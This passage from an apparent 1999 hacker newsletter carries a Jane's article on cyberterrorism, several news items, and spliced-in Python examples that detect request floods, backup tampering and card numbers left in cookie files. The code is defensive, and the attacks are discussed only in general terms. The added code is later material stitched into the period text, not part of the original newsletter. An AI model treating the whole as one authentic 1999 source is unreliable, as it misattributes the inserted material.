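    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("target").split("?", 1)[0]   # drop the query string
    return ts.isoformat(), m.group("host"), path


def detect_floods(log_text, rate_threshold=50, distinct_threshold=20):
    """Bucket requests by (second, path); count requests and distinct sources.

    A bucket is reported only when the rate is high AND the requests come
    from many distinct sources. That combination is what makes the attack
    'co-ordinated', and max_per_source shows why per-address blocking
    does not help: each address contributes almost nothing on its own.
    """
    buckets = defaultdict(lambda: defaultdict(int))   # (sec, path) -> host -> n
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue                                    # skip unparseable lines
        second, host, path = parsed
        buckets[(second, path)][host] += 1

    alerts = []
    for (second, path), per_host in sorted(buckets.items()):
        total = sum(per_host.values())
        if total >= rate_threshold and len(per_host) >= distinct_threshold:
            alerts.append({
                "second": second,
                "path": path,
                "requests": total,
                "sources": len(per_host),
                "max_per_source": max(per_host.values()),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_floods(SAMPLE_LOG):
        print(alert)
```

On the constructed log this reports three buckets for /cgi-bin/search.cgi, each with 100 requests from 100 sources and a per-source maximum of 1, while the two ordinary hits are never reported. The same logic applies to any server whose log can be bucketed by time and resource; the thresholds are the part to tune against the site's normal traffic.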
UK and US interbank transactions are backed up daily with multiple remote tapes, so any cracker wanting to destroy the interbank market will cause the loss of at most one day's transactions. However, this is not without consequence: consumer confidence in the banking system might drop to unprecedented levels were exploits to be publicised.

Viruses are a form of erasure most computer users are familiar with. Indeed, as a teenager Robert Morris accidentally launched a virus that shut down most of the Unix-based computers in the USA in the 1980s. Much can be said for judging the security implications of information technology by the fact that virus protection is now standard on any company computer. A good thing too, as 1999's 'Melissa virus' was the first of a new generation of Microsoft-targeted viruses that are self-replicating by sending themselves forward in an email entitled 'Important message from . . .' to the people listed in a person's Outlook Express email package without their knowledge. The 'Bubbleboy' virus promises to be worse, as you just have to receive it to be affected.

Erasing attacks can be guarded against through multiple, remote (in both geography and network topology) back-ups, taken at sufficient frequency that the maximum possible loss is bearable for the system (the 'safe frequency'). Any system for which the safe frequency is too low for the defence to be practical (such as a power grid) tends to be kept remote from networks, although this is not always the case.

Yet for every solution there is a problem. The effectiveness of back-ups can be circumvented by malicious programming that corrupts one random byte in the data; even though the back-ups look good, the data is bad. There is no way of telling unless the whole tape is recovered to find the one or two data files that have changed and examining them 'with a microscope'.
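The one-corrupted-byte problem above is exactly what a per-file digest manifest, recorded with each backup generation and authenticated with a key held off the backed-up systems, is for: a flipped byte changes the digest, so the changed file is found by comparing two small manifests rather than by examining a whole tape. The Python below is an added example, not code from the Jane's report. It goes a little beyond the paragraph: the same digests also give the cross-site consistency check the report recommends later against non-destructive spoofing, so a majority-vote comparison across replicas is included. The file contents, the corruption, the site names and the manifest key are all constructed for the example.

```python
"""Detect silent corruption of backed-up data with hashed, authenticated manifests.

Added example, not code from the Jane's report. The files, the flipped
byte, the replica names and the manifest key are constructed for the
example.
"""
import hashlib
import hmac
from collections import Counter

# Key used to authenticate manifests. Assumed value; in practice it lives
# off the systems being backed up, so whoever alters the data cannot also
# re-sign the manifest to match.
MANIFEST_KEY = b"example-offline-manifest-key"


def build_manifest(files):
    """Map file name -> SHA-256 hex digest for one backup generation."""
    return {name: hashlib.sha256(data).hexdigest() for name, data in files.items()}


def sign_manifest(manifest, key=MANIFEST_KEY):
    """HMAC-SHA256 over a canonical rendering of the manifest."""
    canonical = "\n".join(f"{n} {d}" for n, d in sorted(manifest.items()))
    return hmac.new(key, canonical.encode(), hashlib.sha256).hexdigest()


def verify_manifest(manifest, tag, key=MANIFEST_KEY):
    """True only if the manifest is exactly the one that was signed."""
    return hmac.compare_digest(sign_manifest(manifest, key), tag)


def unexpected_changes(previous, current, expected_changed=()):
    """Files whose digest changed between two generations without a recorded
    reason. A single corrupted byte shows up here; no tape needs examining."""
    expected = set(expected_changed)
    return sorted(
        name for name, digest in previous.items()
        if name in current and current[name] != digest and name not in expected
    )


def replica_disagreements(replica_manifests):
    """Compare one generation held at several sites. For each file the
    majority digest is the reference; sites holding anything else are reported."""
    names = set().union(*(m.keys() for m in replica_manifests.values()))
    report = {}
    for name in sorted(names):
        votes = Counter(m.get(name) for m in replica_manifests.values())
        majority = votes.most_common(1)[0][0]
        odd = sorted(site for site, m in replica_manifests.items() if m.get(name) != majority)
        if odd:
            report[name] = odd
    return report


def demo():
    """Constructed scenario: one legitimate edit and one flipped byte."""
    gen1 = {
        "ledger.dat": b"ACCT-001 balance 1000\nACCT-002 balance 2500\n",
        "notes.txt": b"daily close ok\n",
    }
    gen2 = dict(gen1)
    gen2["notes.txt"] = b"daily close ok\nreviewed\n"      # recorded, expected change
    damaged = bytearray(gen1["ledger.dat"])
    damaged[20] ^= 0x01                                    # '1000' silently becomes '1001'
    gen2["ledger.dat"] = bytes(damaged)

    m1, m2 = build_manifest(gen1), build_manifest(gen2)
    changes = unexpected_changes(m1, m2, expected_changed=["notes.txt"])
    # Three sites hold what should be the same generation; site-c has the bad copy.
    disagreements = replica_disagreements({"site-a": m1, "site-b": m1, "site-c": m2})
    return changes, disagreements


if __name__ == "__main__":
    print(demo())
```

Running it reports ledger.dat as the unexpected change and site-c as the dissenting replica for both files. The manifest is deliberately tiny compared with the data it describes, which is what makes comparing ten weeks of generations practical; the HMAC matters because a manifest stored beside the backup is as reachable to the intruder as the backup itself.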
The problems are obvious if someone had 10 weeks of back-ups, each with different bits of bad data, and all the back-ups were infected. There would be no way to know which data was good and which was bad. Indeed, if the cracker knows enough about the system he/she is attacking, recovery may be impossible.

Spoofing is much more difficult to guard against. This kind of attack comes in two guises: attempts to create phoney records or phoney messages in a system (such as creating false bank accounts); or attempts to create phoney instructions to the processing system, causing a failure of the system. This is as bad as an erasing attack. The easiest way to defend against non-destructive spoofing is again to use back-ups and to operate double-entry book-keeping, which traces every record to its creation and requires consistency between numerous (again, preferably topologically remote) sources. This multiplies the difficulty of an attack as the attacker has to break several systems instead of just one. By appearing to be a user, however, a cracker could manipulate data or corrupt the hardware by installing a virus, for example. While this would not be quite like a bomb going off, it could have much worse long-term repercussions.

    The Internet Auditing Project
    Host count: 36,431,374
    Vulnerability count: 730,213
    Vulnerable host count: 450,000

Destructive spoofing aimed at the processor rather than its records is a different matter. Causing the processor to execute phoney instructions could allow an attacker to erase records, transmit phoney messages and, potentially, cover his/her tracks well enough to escape consistency checks. This kind of attack is more difficult than any other - usually the only way to get another machine to execute rogue instructions is to exploit 'buffer overflows', overloading the temporary data buffer on computers. Nightmare scenarios are based on such attacks.
"We could wake one morning and find a city, or a sector of the country, or the whole country having an electric power problem, a transportation problem or a telecommunication problem because there was a surprise attack using information warfare," claims Richard Clarke, the US National Security Council adviser who heads counterterrorism efforts.

Whilst alarmist, precedents do exist, as evidenced by Gail Thackaray, recognised as one of the premier cracker-catchers in the business: "One hacker shut down a Massachusetts airport, 911 emergency service and the air traffic control system while playing with the municipal phone network, and another hacker in Phoenix invaded the computer systems of one of the public energy utilities, attaining 'root' level privileges on the system controlling the gates to all the water canals from the Grand Canyon south." These examples involved individuals rather than organised groups, and none of them were politically motivated.

Cyberterrorism?

In warfare as well as in business, IT is the great equaliser. Its low financial barrier to entry relative to heavy industry allows even the poorest organisations an IT effectiveness equal (or nearly equal) to large corporations. The greatest advantage the covert warfare arms of major nation-states (such as the CIA or Mossad) have over small terrorist organisations is the financial wherewithal to develop massive intelligence networks using the best equipment. IT levels the playing field in this regard.

Because sensitive military computers are required to be kept as far away from the Internet as possible, unless there was some major oversight or an incidence of social engineering, a military system cannot be directly attacked. However, there is always a weak link in the chain: for example, an army depends on Vendor A for supplies/equipment, and Vendor A depends on parts from Vendor B, and so on.
Somewhere in that chain is a vulnerability due to the massive networks, technological dependence and just-in-time ordering systems. Indeed, although direct attacks on critical infrastructure are unlikely, if on a network that has a link into it elsewhere, then one vulnerability is all it takes. Strikes in one automotive plant have effectively shut down large car makers. Most US automotive plants are also government contractors supplying vehicles and replacement parts to the military: an obvious target for planting viruses during war.

Some people collect baseball cards, others analyse protocols

Cyberterrorism is not only about damaging systems but also about intelligence gathering. The intense focus on 'shut-down-the-power-grid' scenarios and tight analogies with physically violent techniques ignore other more potentially effective uses of IT in terrorist warfare: intelligence-gathering, counter-intelligence and disinformation. Disinformation is easily spread; rumours get picked up by the media, aided by the occasional anonymous e-mail. Cracking into a government server and posting a new web page looks impressive and generates publicity, but cracking into a government server and reading private email is much more valuable to terrorists. This gives cyberterrorists valuable details about the thought and operations of their adversaries, and can aid in planning conventional attacks.

Furthermore, if terrorists can penetrate the security of an enemy organisation's computer networks, they do not need to do any damage to be militarily effective. Rather, they can quietly copy information to process at their leisure, without having to physically smuggle it out of secure facilities. False or misleading information can be planted in (or deleted from) databases, undermining the effectiveness of organisations relying on that information. In today's environment, authentication via strong encryption is still rare and IT makes forgery easy.
Credentials can be forged to fool authorities or the media for purposes of disinformation or to enhance covert physical activities. As pointed out by Clifford Stoll in The Cuckoo's Egg, automated 'data mining' techniques can be used to search for useful patterns in vast stores of insecure and seemingly unrelated data. A bank may assume its electronic fund transfer system is the most vital system to protect, but a terrorist may only want access to the financial records of persons or groups that are the bank's customers. This may not even involve destruction of data, as the pure information is often much more valuable than simply destroying random records. Reconnaissance attacks such as these are difficult to stop but extremely damaging.

In the long-term banking scenario, the terrorist may simply choose to track sources of funding based on deposit records to harm the person or group who is the target. In a situation like this, going into the bank to destroy the information is only a temporary setback and will raise attention. Why destroy a valuable point of information gathering by doing something short-term like disrupting operations?

Nevertheless, for the terrorist, cracking might be used for more than just destroying data. Attacking an information system would be a good way to either distract the target or otherwise enable the terrorist to perform a physical attack. An example might be to crack into an airline and delete transport manifests to cover the transport of illegal materials. Had Shoko Asahara and the Aum Shinrikyo group been able to crack the Tokyo power system and stop the subways, trapping passengers on the trains, the number of casualties caused by their 1995 Sarin gas attack might have been significantly larger. If a determined group wanted to bring New York to its knees, what better way than to combine a physical bombing campaign with simultaneous IT attacks on the power grid, hospitals, emergency services and the media?
Turning to the larger picture, in warfare the party that runs out of funds first loses. Thus, the objective of warfare may not just be to inflict as much physical damage as possible, but instead be to maximise financial damage. The Irish Republican Army (IRA) learnt to use this concept very effectively in recent years, sufficiently occupying the resources of the British government through infrastructural attacks (as opposed to direct attacks against people). This suggests that, in the future, stock markets or other primary financial institutions might become high-profile targets and the most effective means of accomplishing a terrorist's goal. More damage would be accomplished by taking the New York Stock Exchange offline for a few days rather than actually bombing a building. That said, financial institutions are one of the few parties recognised in the hacker community for taking their security very seriously indeed.

Given the predominance of the IT-based industry and the familiarity of the Internet in the USA and Western Europe, the terrorist groups that fit the motive and mindset to use cracking could be closed religious or fanatical groups whose value systems are so out of sync with the mainstream that they feel threatened enough to take as much of the world with them as they 'go under'. That, together with 'lone gunmen' and activism campaigns - 'hacktivism' - are scenarios that appear to fit the profile.

A Pakistani Internet hacker known only as 'Dr Nuker', for example, has a message for Americans: he and a cybercohort, one 'Mr Sweet', have not yet begun to fight. The idea of Third World cyberpunks threatening the planet's sole superpower might seem unlikely - unless, of course, you run Internet sites at Lackland AFB or 86 other facilities that their group, the 'Pakistan Hackerz Club' (PHC), has struck in the past five months.
The PHC's self-described founder and perhaps the world's most prolific Web cracker today, Dr Nuker admits he's a revolutionary, a 'cyberterrorist' with a cause: freedom for Indian-controlled Kashmir. Yet by penning anti-Indian missives on Internet sites run by the Naval Reserve Maintenance Facility in Ingleside, the Karachi Stock Exchange and even the Disney Guide, Dr Nuker not only has become a high-profile 'hacktivist' - a computer cracker with a political or social goal - but a wild card who hints he can wreak havoc far from home. "We don't have any intentions to compromise any sort of military or governmental database, but in case there will be a cyber war with Pakistan, then we will sure prove our knowledge, ability and skills," he warned in an e-mail message.

It may be no idle boast. Today, employers, even those running critical infrastructure, are hard-pressed not to give employees Internet access; 401k retirement plans, health insurance plans and others are starting to mandate it. Most employees are on insecure, poorly administered, unreliable desktop operating systems: the recipe for serious electronic mayhem.

Beyond the hype

Critics maintain there is no such thing as cyberterrorism, and there is undoubtedly a lot of exaggeration in this field. If your system goes down, it is much more interesting to say it was the work of a foreign government rather than admit it was due to an American teenage 'script-kiddy' tinkering with a badly written CGI script. If the power goes out, people light a candle and wait for it to return, but do not feel terrified. If their mobile phones switch off, society does not instantly feel under attack. If someone cracks a web site and changes the content, terror does not stalk the streets. Some groups talk of taking down power grids; while that would help in conjunction with another type of attack, in itself it would be useless. Most grids suffer infrequent black-outs anyway that are not terrorist-related.
In fact, terrorism campaigns using just computers are unlikely. The sheer size of programmes works against the attacker more than the defender. No one person can fully understand a programme comprising over a million lines of code, especially if he/she did not write it, and the defender has more people available. Critical programmes that run infrastructure functions, such as traffic lights, are usually custom-written, making them twice as difficult to attack. Any system put together in the last few years will have been implemented with security in mind. Ironically, Y2K could prove to be a boon, as audits will give detailed reports on exactly what is in a system and this information can be used to boost security.

Most security-aware organisations do not put highly sensitive (such as military or corporate) data on servers that are accessible via the Internet and design their Internet servers to be disposable and easily reinstalled from compact disc (CD) or tape. These organisations also typically keep their servers in restricted-access areas. Most organisations with sensitive data also keep off-site back-ups. Write-once CDs are becoming very popular as they are inexpensive, compact and convenient to restore from. To cause serious and lasting damage, a terrorist would need to destroy or corrupt not only the contents of the servers, but also the off-site back-ups.

Reality bytes

In theory, cyberterrorism is very plausible, yet in reality it is difficult to conduct anything beyond simple 'script-kiddy' DoS attacks. Terrorists attempting to sway a populace by fear would therefore be less interested in such an attack unless they could carry out an extremely damaging one on a repeatable basis or unless they used it to augment the effects of a physical attack. As things stand, while a terror attack using crackers is potentially highly destructive, the psychological impact of the disruption of services is still much lower than that of a direct physical attack.
Johan J Ingles-le Nobel is Deputy Editor of JIR, having previously obtained his Masters at St Andrews University. He gratefully thanks the contribution and advice of people at Slashdot.org.

@HWA

17.0 Car Radio Listening Habits Being Gathered
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by Evil Wench

     Think you're safe from the prying eyes of the data collector when you're peacefully driving your car and listening to the radio? Think again. New technology being tested in Atlanta, Toronto, Los Angeles and Phoenix can remotely determine what radio station you are listening to in your car. Small shoebox-size electronic sensors posted on billboards and light poles can listen to the signal from the oscillator in the car radio, determine the frequency and log the information in a central database. This information is then made available to subscribing radio stations in real time to help in determining ratings numbers. (Even though this system does not collect demographic data, can't collect AM yet, and doesn't listen to homes or businesses, it is still scary as hell.)

     The Atlanta Journal Constitution
     http://www.accessatlanta.com/partners/ajc/newsatlanta/radio/index.html

Getting with the program

WCNN to debut as issue-oriented talk radio geared to Atlanta's black audience

We've got rock, rap, country, salsa and smooth jazz. But come April 3, Atlanta will have a new radio format - black news/talk. That's when Midwestern Broadcasting, owner of adult R&B station Kiss 104.7, will take over programming of WCNN/680 AM from Cox Radio and launch a 24-hour news/talk station aimed at Atlanta's African-American community.

According to Midwestern Vice President David Dickey, the station will emphasize local programs rather than syndicated shows, and focus on issues such as education, government, health care and the economy. In the next few weeks, the company will announce the station's new name, unveil a logo and begin hiring on-air talent.
The takeover will end WCNN's lineup of news/talk shows, including Tom Hughes in the morning, the syndicated G. Gordon Liddy show at midday and Neal Boortz producer Royal Marshall's talk show in the afternoon.

"I don't think Neal [Boortz] or Dr. Laura [Schlessinger] are focused on the needs and issues of the average African-American listener," Dickey said, referring to popular programs on news/talk stations WSB-AM and WGST-AM/FM. "If we are here to serve the black community, programming has to originate from that community. If you had to pick any city in America to support this effort, Atlanta is the city to do it."

According to Arbitron, the company that provides radio ratings, 769,000 of Atlanta's 3 million radio listeners ages 12 and older are black.

As news of the venture trickled into the radio community Tuesday, many industry observers seemed to believe that a black news/talk station would be a savvy addition to Atlanta's increasingly competitive and lucrative radio market. At 50,000 watts in the daytime and 10,000 watts at night, WCNN is the second-strongest AM signal in town, behind WSB.

"Oooh, that's smart," said Star 94 general manager Mark Kanov upon hearing the news. "A market like Atlanta would certainly have a strong core for a station like that. On the surface, it seems like it would have a very strong appeal."

"It's what I would do if I owned the station," said Andrew Saltzman, general manager of Sportstalk 790/The Zone. "Talk radio is a booming format, and that's a [demographic] that's not truly being catered to. Why shouldn't the urban community have full-service talk radio?"

Black news/talk is not a new idea. The format has been successfully adopted by WOL in Washington and WLIB in New York. But because there was usually only one per community, urban radio stations have not broken into niche formats as quickly as stations geared to white audiences.
For example, V-103, Atlanta's top-rated urban station, was the only major FM station catering to the African-American audience until 1992, when Kiss 104.7 signed on the air. V-103 morning host Frank Ski explained how such exclusivity affected the listening habits and expectations of the black radio audience.

"For a long time, the lack of radio stations available to minorities meant we didn't have a second or third choice when it came to radio," Ski said. "That made the black community begin to like a whole package of things [on one station]. We want to hear music, hear something funny and be informed. Black talk can be good for the market if it's done right. The difficulty is that because we haven't really had it, there's not a lot of good, available talent to do it. They will be competing with the white news-talk stations, so they really need to have their game together."

Midwestern Broadcasting, which is owned by the Dickey family, has specialized in creating formats for the African-American community, such as the adult R&B of Kiss 104.7 and the contemporary gospel of Glory 1340 AM. However, some have raised questions as to whether white management is politically or socially motivated. Ryan Cameron, morning man at rap station Hot 97.5, wonders whether Midwestern will take the new station into the community as much as he or Ski do with their shows.

"Anything that's going to make the market more interesting is definitely a plus," Cameron said. "It's great to raise issues and talk, but how visible will they be? It's not like they got new owners. I'll be curious to see how much involvement there will be in the community other than monetary."

Dickey doesn't believe that a black news/talk station with white ownership will cripple its chances of success. "Race has nothing to do with it, it just makes good economic sense," he said. "Sure, we're trying to make a buck off this.
But more important, we've been able to provide a choice for African American listeners in Atlanta. As a broadcaster, it's my responsibility to research the market and find the opportunities that are there. We have two well established radio stations in Kiss and Glory, and this is an extension of that niche. I don't care if you're white, black, Chinese, male, female, young or old, it doesn't make sense to go up against established stations like WSB or WGST. [A black news/talk station] complements our package. We can cross-promote each station with the other two. We can utilize people who appear on one and put them on the other."

The transaction does not involve the sale of 680 AM, rather a switch in who is calling the shots about what is on the air. For five years, Midwestern Broadcasting, which owns the frequency, has leased 680 AM to Cox Radio, owner of news/talk giant WSB-AM (750). Cox Radio has spearheaded programming, first as a sports-talk station (680/The Fan), then turning WCNN into a news/talk station in 1997. The lease between the two companies expires April 2.

According to Marc Morgan, co-chief operating officer of Cox Radio, the decision to end the arrangement was mutual. "When we made this [leasing] deal five years ago, it made great sense at the time and served the purpose it was meant to serve," he said. "There's definitely a hole in the market for a black talk station, and I think it's a good idea. ... I haven't heard it yet, so I couldn't even begin to speculate on what effect, if any, it would have on any other station in town."

@HWA

18.0 CVE by Mitre Goes Online
     ~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by Weld Pond

     The Common Vulnerabilities and Exposures database run by Massachusetts defense contractor Mitre has gone online. The database hopes to help standardize computer security terms and set a common vocabulary for building more secure systems. The database hopes to contain all known system vulnerabilities.
     (It is unlikely that any of the big 5 security companies will give up new vulnerabilities that only they know about for their competitors to find in this database. The database is already missing some key advisories that have been publicly released.)

     The Boston Globe
     http://www.globe.com/dailyglobe2/335/business/Handle_on_hackers%2b.shtml

     Common Vulnerabilities and Exposures Database
     http://www.cve.mitre.org/

Handle on hackers

Bedford firm seeks security standard with software-weakness list

By Ross Kerber, Globe Staff, 12/01/99

BEDFORD - Before the invention of the periodic table in 1869, chemists struggled to put elements such as hydrogen and lithium into a coherent classification scheme. Today, parts of the field of computer science now seem stuck with the same lack of organization. In particular there is little agreement among software security specialists on just how to classify the sections of computer code that are often targeted by hackers.

Government and academic groups have attempted to categorize these software Achilles' heels for years, to little commercial enthusiasm. But now some steam is gathering behind a project run by Bedford-based Mitre Corp. to create a simpler listing of weaknesses. The project doesn't try to classify codes and other security problems into families or types, but only to list them as part of what Mitre calls a directory of ''Common Vulnerabilities and Exposures.''

By dumbing down its directory, known as the CVE, Mitre has persuaded 23 organizations including Cisco Systems Inc. and IBM Corp. to participate. The result can be found on line at www.cve.mitre.org, and executives hope it will help standardize terms and set a common vocabulary for building more secure systems.

''The beauty of the approach we've taken is to avoid everybody arguing'' about complicated categorizations, said Steven Christey, a software engineer at Mitre, a nonprofit government contractor.
His colleague, David Mann, compares the CVE to the lists of individual elements that were drawn up long before the periodic table was accepted. ''To get things going scientifically we really need to start small,'' Mann said. ''Hopefully it will spawn more categorizations, eventually.''

While software viruses are quickly studied and named, the security weaknesses they attack vary widely and are far more difficult to classify. Consider the various names given for a type of code used by many Web sites known as the ''common gateway interface,'' or cgi, generally used to connect the site to on-line sources such as telephone directories. Altering such code can cause big disruptions to the sites, a weakness known as ''CA-96.06.cgi-example code'' by CERT, a well-known computer-security center at Carnegie Mellon University. Meanwhile CyberSafe Corp., an Internet security firm based in Issaquah, Wash., discusses the same weakness as an ''HTTP `phf' Attack.''

While both continue to use those names, they also have begun to include in their advisories the name chosen by Mitre for the condition: ''CVE-1999-0067,'' meaning that the problem was the 67th identified under the CVE effort this year. Eventually they might drop their own terminologies altogether, said Bill Fithen, a CERT security analyst. ''If CVE catches on, there might truly be no legitimate reason to continue'' using older names, he said.

For Mitre, CVE represents a chance to show off the commercial benefits of its work for government agencies. Founded in 1958 by a group of researchers formerly associated with MIT's Lincoln Laboratories, Mitre has chiefly been known as a contractor on aerospace and classified military projects, with offices from Fort Leavenworth, Kan., and Washington, D.C., to Seoul. The company also has branched out into the civilian sector and now runs research centers for the Federal Aviation Administration and the Internal Revenue Service.
In 1996 Mitre spun off divisions that did research in space, environment, and telecommunications. It still has about 4,000 employees worldwide and reported revenue of $542 million for its latest fiscal year. At the behest of the Pentagon, Mitre several years ago began research in areas of ''critical infrastructure protection''; 15 of the company's employees now are involved in an FBI anti-hacking center in Washington, D.C.

The CVE is rooted in such work, dreamed up by Mann after he was assigned last year to create a database to protect the company's computers. Mann wanted to automatically compare alerts issued by CERT and other security groups with an analysis of traffic on Mitre's computers, but Mitre's programmers were using different terms. ''I realized we needed a way to put these things together,'' said Mann, 37, who holds a doctorate in mathematics and once taught at a US Navy postgraduate program in California.

Mann developed the idea with Christey, 32, a senior software engineer, and last January they presented a paper at a conference at Purdue University in Indiana, sparking broader commercial interest. Now many attendees of that conference are members of CVE's 25-member editorial board made up of software vendors, analysts, and academics, and headed by Christey. So far the group has agreed to assign numbers to about 320 vulnerabilities, and hopes to get to 665 by the end of the year.

Like many business consortiums, the CVE board also includes members who aren't so enthusiastic. Some worry their competitors will learn their secrets. ''CVE will only contain vulnerabilities that are old or not interesting,'' said Marcus Ranum, chief executive of closely held Network Flight Recorder in Woodbine, Md. To monitor possible breakthroughs Ranum has assigned an employee to join the CVE board, which holds conference calls periodically to discuss new entries. But the board member won't give away too much, Ranum says.
''It puts me in a delicate spot as a vendor,'' he said. ''If I were going to make CVE useful I'd give all my information to CVE. But then my competitors would have it and my shareholders would kill me.''

But other CVE participants say they hope the list will demystify their work to corporate customers and boost sales. ''Generally people can get pretty confused when you try to sell them software,'' said Andre Frech, a researcher at Internet Security Systems in Atlanta, which recently began including CVE numbers in a detection database.

Internet Security Systems' founder, Christopher Klaus, says the CVE might someday even become the basis of ''hacker insurance'' policies for companies to minimize the impact of technical disruptions. Without CVE or something like it, he said, ''it would be hard even to set the premiums ... because people couldn't be specific enough about what they might be selling.''

If CVE catches on, it will please specialists who have tried to develop more complex classification schemes with little notice, like Eugene Spafford, a computer scientist at Purdue who ran the conference where Mann and Christey first presented their paper. Four years ago Spafford began building his own open database of computer security flaws, but found few companies could agree on organizing criteria. In contrast, he said, CVE has already achieved ''a lot more buy-in than has happened in the past.''

This story ran on page C01 of the Boston Globe on 12/01/99.
(c) Copyright 1999 Globe Newspaper Company.

@HWA

19.0 Novell Head Victim of Online Credit Card Theft
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by Weld Pond

     Novell chief Eric Schmidt has admitted that he has been the victim of credit card theft. Speaking at San Francisco's Digital Economy conference he blamed the theft of his personal information on browser cookies. He labeled cookies as "the biggest disaster for computers in the past [few] years."
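     The HNN item above turns on one fact: a browser cookie file is a plain text file on the user's disk, so anything a site chose to put in a cookie (a card number, a password) can be read by anything else that can read that file. The script below is an added example, not code from the article, from Novell or from HNN; it parses the seven-column Netscape cookies.txt layout (domain, include-subdomains, path, secure flag, expiry, name, value), which is a real format, and flags cookies whose value contains a Luhn-valid card-like number and cookies stored without the Secure flag. The file contents are constructed, and the card-like value is the well-known Luhn-valid test number 4111111111111111, not anyone's real card.

```python
"""Audit a Netscape-format cookies.txt for card-number-like values and for
cookies that lack the Secure flag. Added example, not code from the ZDNet
article or from Novell; the file contents below are constructed, and the
card-like value is a well-known Luhn-valid test number, not a real card."""
import re
from typing import List, Tuple

# Constructed sample in the seven-column Netscape cookie file layout:
# domain, include-subdomains, path, secure, expiry, name, value.
SAMPLE_COOKIES = (
    "# Netscape HTTP Cookie File\n"
    ".example.com\tTRUE\t/\tFALSE\t946684800\tsessionid\tabc123def456\n"
    ".shop.example\tTRUE\t/\tFALSE\t946684800\tcardnum\t4111111111111111\n"
    ".shop.example\tTRUE\t/\tTRUE\t946684800\tprefs\tcolor=blue\n"
)

# 13 to 19 consecutive digits, not embedded in a longer digit run.
CARD_RE = re.compile(r"(?<!\d)\d{13,19}(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum: double every second digit from the right,
    subtract 9 when the doubled digit exceeds 9, and require sum % 10 == 0."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def audit_cookie_file(text: str) -> List[Tuple[str, str, str]]:
    """Return (finding, domain, cookie-name) triples: 'insecure' for cookies
    stored without the Secure flag, 'card-like' for values holding a
    Luhn-valid run of 13-19 digits."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split("\t")
        if len(fields) != 7:
            continue  # not a cookie record; skip rather than guess at it
        domain, _subdomains, _path, secure, _expiry, name, value = fields
        if secure.upper() != "TRUE":
            findings.append(("insecure", domain, name))
        if any(luhn_ok(m.group()) for m in CARD_RE.finditer(value)):
            findings.append(("card-like", domain, name))
    return findings


if __name__ == "__main__":
    for finding in audit_cookie_file(SAMPLE_COOKIES):
        print(*finding)
```

     Run against a real cookie file, the 'card-like' findings are the ones to act on first: a site that stores card data client-side has put it where any local malware or another user of the machine can read it, which is the scenario Schmidt describes.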
     ZD Net
     http://www.zdnet.com/zdnn/stories/news/0,4586,2403346,00.html?chkpt=zdnntop

Novell chief's credit card stolen online

Eric Schmidt blames cookies for cyber theft -- calls cookies 'one of the biggest disasters for computers.'

By Ben Elgin, Sm@rt Reseller
UPDATED December 2, 1999 3:26 PM PT

Novell chief Eric Schmidt knows firsthand the problem of Internet fraud. Speaking at San Francisco's Digital Economy conference Thursday, Schmidt informed the crowd that his credit card number had been stolen over the Internet in the past.

Although he isn't sure exactly how his card number was lifted, Schmidt says he believes it was through a mechanism that reads the cookie files sitting on a user's desktop and storing personal information, such as passwords and preferences. "Cookies are one of the biggest disasters for computers in the past [several] years," says Schmidt, citing the lack of security and the blatant breach of consumer privacy.

As Novell's chairman and CEO, Schmidt is trying to oust cookies with his company's new "digitalme" online identification-management service. Based on Novell Directory Services technology, digitalme is aiming to store and consolidate a user's multiple passwords, address books, favorites lists and purchasing preferences. "Cookies are a great idea, [but] they are just stored in the wrong place," says Schmidt.

Schmidt's brush with cyber thieves may have left him wary, but not a whole lot poorer. "My liability was $50 ... [but] I'm not sure what the credit card company's liability was," he says.

@HWA

20.0 IDC Says E-Commerce Unsafe Most of the Time
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by Deepquest

     The most recent Technology Integration Panel Study, conducted by International Data Corporation, paints a grim picture of online security. Consumers have worried about the security of their online transactions, and this study seems to justify those fears.
     The study, entitled "E-Commerce Solutions: Customer Directions and Segmentation by Company Size and Industry", explores various market segments currently using e-commerce systems and what the potential is for the future. (Unfortunately the data for this study is already six months old and had an extremely small sample size. Hopefully a more comprehensive study can be conducted soon.)

     South China Morning Post
     http://www.technologypost.com/enterprise/DAILY/19991202103702261.asp?Section=Main

Published on Thursday, December 2, 1999

ENTERPRISE

Online transactions are not all secure, says study

NEWSBYTES

Consumers have worried about the security of their online transactions, and a new study by International Data Corporation (IDC) justifies their fears. According to IDC's most recent Technology Integration Panel Study, one in five large companies (those having 1,000 or more employees) is likely not to have a secure transaction option available. In small companies (10-99 employees) the ratio of firms not having a secure transaction option rises to one in three.

"Information technology is again changing the business landscape, offering the potential for better products and services delivered to corporations, governments, and consumers alike through the engineering of e-solutions," said Carey Azzara, program director of IDC's "Corporate Computing: Vertical Views" research. "However, realising this potential is not easy and certainly not without pitfalls for the vendors trying to bring the world into this new paradigm."

Mr Azzara emphasised the point that unless companies have a secure means of accepting payment for a transaction, whether that transaction is e-retail or business-to-business, they are not engaging in e-commerce; rather, they are engaging in e-business, which is not the same. "I will pick a secure server all the time," Mr Azzara said when discussing how payment is made online.
Under no circumstances, he cautioned, should credit card numbers be given in a non-secure environment. In fact he would not accept a secure-transaction logo on a Web site, but would make sure that the online merchant's server was really secure with encryption and authentication capabilities.

Over 40 per cent of the survey's respondents reported that they paid a premium for better e-commerce system performance. The study found Microsoft had the largest hold on the market, but Netscape, IBM, and Oracle were seriously considered by 25 per cent of the responding companies.

The full study, entitled "E-Commerce Solutions: Customer Directions and Segmentation by Company Size and Industry", explores the market segments currently using e-commerce systems and how the potential for future business is shaping up. The study, conducted during July 1999, sampled 974 US and Canadian companies, stratified by size and industry, and was weighted to reflect information and communication technology of each marketplace.

